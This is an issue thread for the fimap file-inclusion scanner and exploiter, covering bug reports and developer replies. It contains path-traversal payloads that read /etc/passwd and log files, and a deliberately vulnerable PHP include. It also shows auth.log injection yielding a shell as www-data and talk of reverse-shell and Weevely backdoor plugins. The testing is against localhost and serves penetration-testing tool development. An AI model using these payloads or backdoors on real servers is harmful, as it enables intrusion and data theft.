akiraaisha / fimap

Automatically exported from code.google.com/p/fimap
1 stars 0 forks source link

Fimap not detecting even test file inclusion bugs... #67

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
This error occurs on all test file inclusion bugs I have trialled.
Test example: http://localhost/inclusiondemo/lfi1.php?file=contactus.php

In this example the file= parameter is vulnerable to LFI, 
Example: http://localhost/inclusiondemo/lfi1.php?file=../../../../etc/passwd

However, fimap seems unable to discover this vulnerability.
See log below...

Fimap Version: fimap v.1.00_svn (Your best friend!)

OS: BackTrack 5 R2

Fimap Output:
root@bt:/pentest/web/fimap# ./fimap.py -u 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
[14:45:11] [OUT] Inspecting URL 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'...
[14:45:11] [INFO] Fiddling around with URL...
Target URL isn't affected by any file inclusion bug :(
root@bt:/pentest/web/fimap# 

Now I try with verbose mode set to debug:
root@bt:/pentest/web/fimap# ./fimap.py -v 3 -u 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

[14:46:56] [DEBUG] Mindepth (0) and Maxdepth (15) loaded from generic.xml.
[14:46:56] [DEBUG] Loaded XML-LD for 'PHP' at revision 3 by Iman Karim 
(ikarim2s@smail.inf.fh-brs.de)
[14:46:56] [DEBUG] XML-LD has no payload(s) defined!
[14:46:56] [DEBUG] XML-LD (Perl) has no eval_kickstarter method defined.
[14:46:56] [DEBUG] Language will not be able to use logfile-injection.
[14:46:56] [DEBUG] XML-LD (Perl) has no write_file method defined.
[14:46:56] [DEBUG] Language will not be able to write files.
[14:46:56] [DEBUG] XML-LD has no readfile patterns defined!
[14:46:56] [DEBUG]   No readfile bugs can be scanned if this is not defined.
[14:46:56] [DEBUG] XML-LD has no extentions defined!
[14:46:56] [DEBUG] Loaded XML-LD for 'Perl' at revision 1 by Iman Karim 
(ikarim2s@smail.inf.fh-brs.de)
[14:46:56] [DEBUG] Trying to load plugin 'TempFileAbuse'...
[14:46:56] [DEBUG] [PHPInfo version 1]
[14:46:56] [DEBUG]     Autor: Iman Karim
[14:46:56] [DEBUG]     Email: fimap.dev@gmail.com
[14:46:56] [DEBUG]     URL  : http://fimap.googlecode.com
[14:46:56] [DEBUG] Trying to load plugin 'msf'...
[14:46:56] [DEBUG] [msf_bindings version 1]
[14:46:56] [DEBUG]     Autor: Xavier Garcia
[14:46:56] [DEBUG]     Email: xavi.garcia@gmail.com
[14:46:56] [DEBUG]     URL  : http://fimap.googlecode.com
[14:46:56] [DEBUG] Trying to load plugin 'test_plugin'...
[14:46:56] [DEBUG] [Test Plugin version 1]
[14:46:56] [DEBUG]     Autor: Iman Karim
[14:46:56] [DEBUG]     Email: fimap.dev@gmail.com
[14:46:56] [DEBUG]     URL  : http://fimap.googlecode.com
[14:46:56] [DEBUG] 3 plugins loaded.
SingleScan is testing URL: 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
[14:46:56] [OUT] Inspecting URL 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'...
[14:46:56] [DEBUG] Analyzing provided GET params...
[14:46:56] [DEBUG] Token found: [file] = [contactus.php]
[14:46:56] [DEBUG] Analyzing provided POST params...
[14:46:56] [DEBUG] No POST params provided.
[14:46:56] [DEBUG] Analyzing provided headers...
[14:46:56] [DEBUG] No headers provided.
[14:46:56] [INFO] Fiddling around with URL...
[14:46:56] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=Rpk6MvQ2' with POST('')...
Target URL isn't affected by any file inclusion bug :(
root@bt:/pentest/web/fimap# 

Here is the source code of the test application:
<?php
$file = $_GET['file'];
if(isset($file))
{
    include("pages/$file");
}
else
{
    include("index.php");
}
?>

Now, I had success with older Fimap versions, but like all pentesters prefer to 
keep my software up to date. It seems this version is not correctly fuzzing the 
parameters. maybe a bug somewhere in the SVN release? From what I am seeing it 
is not fuzzing GET parameters at all.

Original issue reported on code.google.com by the.info...@gmail.com on 21 Mar 2012 at 2:50

GoogleCodeExporter commented 9 years ago
UPDATE: With blind mode flag it actually DOES work, however older versions of 
fimap did not need this flag set. I will just make sure to be using the Blind 
Mode from now on, though I hope the example gives you some ideas :)

root@bt:/pentest/web/fimap# ./fimap.py -b -v 3 -u 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

[14:54:00] [DEBUG] Mindepth (0) and Maxdepth (15) loaded from generic.xml.
[14:54:00] [DEBUG] Loaded XML-LD for 'PHP' at revision 3 by Iman Karim 
(ikarim2s@smail.inf.fh-brs.de)
[14:54:00] [DEBUG] XML-LD has no payload(s) defined!
[14:54:00] [DEBUG] XML-LD (Perl) has no eval_kickstarter method defined.
[14:54:00] [DEBUG] Language will not be able to use logfile-injection.
[14:54:00] [DEBUG] XML-LD (Perl) has no write_file method defined.
[14:54:00] [DEBUG] Language will not be able to write files.
[14:54:00] [DEBUG] XML-LD has no readfile patterns defined!
[14:54:00] [DEBUG]   No readfile bugs can be scanned if this is not defined.
[14:54:00] [DEBUG] XML-LD has no extentions defined!
[14:54:00] [DEBUG] Loaded XML-LD for 'Perl' at revision 1 by Iman Karim 
(ikarim2s@smail.inf.fh-brs.de)
[14:54:00] [DEBUG] Trying to load plugin 'TempFileAbuse'...
[14:54:00] [DEBUG] [PHPInfo version 1]
[14:54:00] [DEBUG]     Autor: Iman Karim
[14:54:00] [DEBUG]     Email: fimap.dev@gmail.com
[14:54:00] [DEBUG]     URL  : http://fimap.googlecode.com
[14:54:00] [DEBUG] Trying to load plugin 'msf'...
[14:54:00] [DEBUG] [msf_bindings version 1]
[14:54:00] [DEBUG]     Autor: Xavier Garcia
[14:54:00] [DEBUG]     Email: xavi.garcia@gmail.com
[14:54:00] [DEBUG]     URL  : http://fimap.googlecode.com
[14:54:00] [DEBUG] Trying to load plugin 'test_plugin'...
[14:54:00] [DEBUG] [Test Plugin version 1]
[14:54:00] [DEBUG]     Autor: Iman Karim
[14:54:00] [DEBUG]     Email: fimap.dev@gmail.com
[14:54:00] [DEBUG]     URL  : http://fimap.googlecode.com
[14:54:00] [DEBUG] 3 plugins loaded.
Blind FI-error checking enabled.
SingleScan is testing URL: 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'
[14:54:00] [OUT] Inspecting URL 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php'...
[14:54:00] [DEBUG] Analyzing provided GET params...
[14:54:00] [DEBUG] Token found: [file] = [contactus.php]
[14:54:00] [DEBUG] Analyzing provided POST params...
[14:54:00] [DEBUG] No POST params provided.
[14:54:00] [DEBUG] Analyzing provided headers...
[14:54:00] [DEBUG] No headers provided.
[14:54:00] [INFO] Fiddling around with URL...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=SEUmBVA9' with POST('')...
[14:54:00] [INFO] Sniper failed. Going blind...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/etc/passwd' with POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/etc/passwd%00' with POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../etc/passwd' with POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../etc/passwd%00' with 
POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../../etc/passwd' with 
POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../../etc/passwd%00' with 
POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../../../etc/passwd' with 
POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../../../etc/passwd%00' with 
POST('')...
[14:54:00] [DEBUG] Requesting: 
'http://localhost/inclusiondemo/lfi1.php?file=/../../../../etc/passwd' with 
POST('')...
[14:54:00] [OUT] Possible file inclusion found blindly! -> 
'http://localhost/inclusiondemo/lfi1.php?file=/../../../../etc/passwd' with 
Parameter 'file'.
[14:54:00] [OUT] Identifying Vulnerability 
'http://localhost/inclusiondemo/lfi1.php?file=contactus.php' with Parameter 
'file' blindly...
[14:54:00] [WARN] Unknown language - Autodetecting...
[14:54:00] [INFO] Autodetect thinks this could be a PHP-Script...
[14:54:00] [INFO] If you think this is wrong start fimap with --no-auto-detect
[14:54:00] [DEBUG] Testing default files...
[14:54:00] [INFO] Testing file '/etc/passwd'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//etc/passwd
[14:54:00] [DEBUG] Skipping file 'c:\boot.ini' because it's not suitable for 
our OS.
[14:54:00] [INFO] Testing file '/proc/self/environ'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//proc/self/environ
[14:54:00] [DEBUG] Skipping file 'c:\windows\win.ini' because it's not suitable 
for our OS.
[14:54:00] [DEBUG] Testing absolute files...
[14:54:00] [INFO] Skipping absolute file 'php://input'.
[14:54:00] [DEBUG] Testing log files...
[14:54:00] [INFO] Testing file '/var/log/apache2/access.log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache2/acces
s.log
[14:54:00] [INFO] Testing file '/var/log/apache/access.log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache/access
.log
[14:54:00] [INFO] Testing file '/var/log/httpd/access.log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/httpd/access.
log
[14:54:00] [INFO] Testing file '/var/log/apache2/access_log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache2/acces
s_log
[14:54:00] [INFO] Testing file '/var/log/apache/access_log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/apache/access
_log
[14:54:00] [INFO] Testing file '/var/log/httpd/access_log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/httpd/access_
log
[14:54:00] [INFO] Testing file '/var/log/auth.log'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/auth.log
[14:54:00] [INFO] Testing file '/var/log/secure'...
[14:54:00] [DEBUG] Testing URL: 
http://localhost/inclusiondemo/lfi1.php?file=/../../../..//var/log/secure
[14:54:00] [DEBUG] Testing remote inclusion...
[14:54:00] [INFO] Skipping remote file 'http://www.phpbb.de/index.php'.
[14:54:00] [DEBUG] Saving results to '/root/fimap_result.xml'...
###############################################################################
#[1] Possible PHP-File Inclusion                                              #
###############################################################################
#::REQUEST                                                                    #
#  [URL]        http://localhost/inclusiondemo/lfi1.php?file=contactus.php    #
#  [HEAD SENT]                                                                #
#::VULN INFO                                                                  #
#  [GET PARAM]  file                                                          #
#  [PATH]       Not received (Blindmode)                                      #
#  [OS]         Unix                                                          #
#  [TYPE]       Blindly Identified                                            #
#  [TRUNCATION] Not tested.                                                   #
#  [READABLE FILES]                                                           #
#                   [0] /etc/passwd -> /../../../../etc/passwd                #
#                   [1] /var/log/auth.log -> /../../../../var/log/auth.log    #
###############################################################################
root@bt:/pentest/web/fimap# 

Original comment by the.info...@gmail.com on 21 Mar 2012 at 2:55

GoogleCodeExporter commented 9 years ago
Ok, another bug!
root@bt:/pentest/web/fimap# ./fimap.py -x
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###########################
#:: List of Domains ::    #
###########################
#[1] localhost            #
#[q] Quit                 #
###########################
Choose Domain: 1
################################################################################
#######################################
#:: FI Bugs on 'localhost' ::                                                   
                                      #
################################################################################
#######################################
#[1] URL: '/inclusiondemo/lfi1.php?file=contactus.php' injecting file: 
'/var/log/auth.log' using GET-param: 'file'    #
#[q] Quit                                                                       
                                      #
################################################################################
#######################################
Choose vulnerable script: 1
[13:11:33] [INFO] Testing PHP-code injection thru Logfile 
SSH-Username-Injection...
[13:11:33] [INFO] Testing if log kickstarter is present...
[13:11:33] [INFO] Kickstarter found!
[13:11:33] [OUT] PHP Injection works! Testing if execution works...
[13:11:33] [INFO] Testing execution thru 'popen[b64]'...
[13:11:33] [OUT] Execution thru 'popen[b64]' works!
######################################################
#:: Available Attacks - PHP and SHELL access ::      #
######################################################
#[1] Spawn fimap shell                               #
#[2] Spawn pentestmonkey's reverse shell             #
#[3] [msf_bindings] Executes MSF reverse payloads    #
#[4] [Test Plugin] Show some info                    #
#[q] Quit                                            #
######################################################
Choose Attack: 1
Please wait - Setting up shell (one request)...
-------------------------------------------
Welcome to fimap shell!
Better don't start interactive commands! ;)
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter 'q' to exit the shell.
-------------------------------------------
fishell@www-data:/var/www/inclusiondemo$> whoami
www-data
fishell@www-data:/var/www/inclusiondemo$> uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
fishell@www-data:/var/www/inclusiondemo$> cd ../
Traceback (most recent call last):
  File "./fimap.py", line 472, in <module>
    list_results(onlyExploitable=showOnlyExploitable)
  File "./fimap.py", line 221, in list_results
    c.start(onlyExploitable)
  File "/pentest/web/fimap/codeinjector.py", line 419, in start
    cmd = item.generatePayload(cmds)
NameError: global name 'item' is not defined

The "cd" and "ls" commands both cause crashes. I had luck using ls -al instead 
of ls, but even cd .. instead of cd ../ cause crash. No idea why...

The "id" command seems to dump a log of the /var/log/auth.log file instead of 
executing commands also. Very odd bug :P

Pentestmonkeys reverse shell also seems to cause bugs, will continue the bug 
hunt though!

Original comment by the.info...@gmail.com on 26 Mar 2012 at 1:14

GoogleCodeExporter commented 9 years ago
Crash on executing MSF plugin payload:

######################################################
#:: Available Attacks - PHP and SHELL access ::      #
######################################################
#[1] Spawn fimap shell                               #
#[2] Spawn pentestmonkey's reverse shell             #
#[3] [msf_bindings] Executes MSF reverse payloads    #
#[4] [Test Plugin] Show some info                    #
#[q] Quit                                            #
######################################################
Choose Attack: 3
Traceback (most recent call last):
  File "/pentest/web/fimap/fimap.py", line 472, in <module>
    list_results(onlyExploitable=showOnlyExploitable)
  File "/pentest/web/fimap/fimap.py", line 221, in list_results
    c.start(onlyExploitable)
  File "/pentest/web/fimap/codeinjector.py", line 443, in start
    haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
NameError: global name 'item' is not defined

Original comment by the.info...@gmail.com on 27 Mar 2012 at 1:37

GoogleCodeExporter commented 9 years ago
Hi the.infodox,

Sorry for my insane late response. University just started and I actually going 
now to school to finish the shit :)

But back to topic.
As you already discovered, fimap checks by default only for visible bugs.
That means that the PHP (or whatever) error message has to be visible.
I called it "sniper" in fimap. So if you read something about "Sniper failed" 
you know that fimap failed to identify a bug because the error pattern was not 
found.

You also already found out that you can enable blind mode. If you enabled 
blindmode fimap still first tries to "snipe" the site. Since this is really 
cheap there is no reason not to try it. When sniping failed, the pathes will be 
bruteforced blindly and fimap hopes to find content of the injected file.

This mode however is really verbose and obvious in the logfiles. But needed if 
errors are disabled like in your case.

As for the other bugs you posted, I will check them out these days if I have 
time.
Should be easily fixed.

Thank you very much for taking your time and giving such a great feedback!
-imax.

Original comment by fimap....@gmail.com on 12 Apr 2012 at 8:32

GoogleCodeExporter commented 9 years ago
No worries about delayed replies, I myself have exams in the Uni now.

I figure that most of the post-shell inject bugs are due to the nature of the 
exploit method - auth log injection - which is probably not the most reliable 
of methods compared to say, error log.

A suggestion though would to be once you "inject" the shell via logfile, to 
have an option to upload a more permenant shell - for example the Weevely 
shell. I am currently trying to write such a plugin, and now have it getting as 
far as almost-running before it crashes :)

Original comment by the.info...@gmail.com on 12 Apr 2012 at 11:28

GoogleCodeExporter commented 9 years ago
Error in HaxHelper.uploadfile

#[6] [reverse http shell] Loads a reverse HTTP shell    #
#[q] Quit                                               #
#########################################################
Choose Attack: 6
Traceback (most recent call last):
  File "fimap.py", line 472, in <module>
    list_results(onlyExploitable=showOnlyExploitable)
  File "fimap.py", line 221, in list_results
    c.start(onlyExploitable)
  File "/pentest/web/fimap/codeinjector.py", line 443, in start
    haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
NameError: global name 'item' is not defined

Thats using the following plugin (which, BTW, you should add to the trusted 
list!)
http://code.google.com/p/ghosthunter/source/browse/#svn%2Ftrunk%2Ffimap%2Fplugin
s%2Freversehttp

Now I saw the same error whenever I tried using the uploadfile thing, so I 
believe it is due to a bug in "item". Either that or we are using the 
uploadfile thing wrong. Not sure which.

Will keep submitting bug reports anyway :)

Original comment by the.info...@gmail.com on 12 Apr 2012 at 11:36

GoogleCodeExporter commented 9 years ago
Hi the.infodox!

I just found and fixed the bug with the missing "item" variable.
I forgot to rename the "item" variable to "working_shell" during my 
refactorings.
Epic fail. At least this bug should be solved now and you should be able to use
most of the stuff.

If you have some time please verify that and let me know :)

Cheers and sorry for the stupid bug,
-imax.

Original comment by fimap....@gmail.com on 13 Apr 2012 at 5:31

GoogleCodeExporter commented 9 years ago
The bug is fixed :D All works fine, however I now know auth.log is NOT a good 
place to inject also - try putting in the "pwd" command, etc, into authlog and 
it goes insane :P

BTW, I wrote a plugin last night, still in "beta" kind of as I need to fix a 
few small bugs:
http://insecurety.net/Downloads/weevils.tar.gz

It uploads a Weevely backdoor onto the victim webserver giving a "Persistent" 
password protected shell you can use :)

Original comment by the.info...@gmail.com on 13 Apr 2012 at 10:32

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hi the.infodox!

Glad the bug is fixed :) Thanks for letting me know about the bug.
I didn't even noticed it. What a shame.

I will make these days some test with the auth.log and check if I find the 
reason for the troubles with it.

If your plugin reaches final or you think it's stable enough let me know and I 
will add it to the trusted plugins!
Will test the beta tonight and see how it is :)

Cheers buddy for your time,
-imax.

Original comment by fimap....@gmail.com on 13 Apr 2012 at 11:38

GoogleCodeExporter commented 9 years ago
I am trying to work out why auth.log blows up so massively but may take some 
time. Will eventually figure it out!

BTW I am actively redeveloping parts of the plugin:
svn checkout 
http://insecurety-research.googlecode.com/svn/trunk/fimap/plugins/weevils/ 
weevils/

Thats where this plugin will be updated until it is 100% stable and I am 
satisfied with it and can move on to more exploit-mode plugins :D

Next up maybe a reverse shell or something...

Original comment by the.info...@gmail.com on 13 Apr 2012 at 12:44

GoogleCodeExporter commented 9 years ago
UPDATE: Weevely plugin now stable!
UPDATE: Added AES Reverse Shell (Rel1k version) Plugin, and its stable!

svn checkout 
http://insecurety-research.googlecode.com/svn/trunk/fimap/plugins/weevils 
weevils/

svn checkout 
http://insecurety-research.googlecode.com/svn/trunk/fimap/plugins/aeshttp 
aeshttp/

Putting tarballs up, and testing for bugs :)

Original comment by the.info...@gmail.com on 16 Apr 2012 at 2:56

GoogleCodeExporter commented 9 years ago
Uitmuntend!

I sent you an mail to your gmail address :)

-imax.

Original comment by fimap....@gmail.com on 16 Apr 2012 at 4:27

GoogleCodeExporter commented 9 years ago
I guess I can close this one :)

Original comment by fimap....@gmail.com on 15 Oct 2012 at 7:58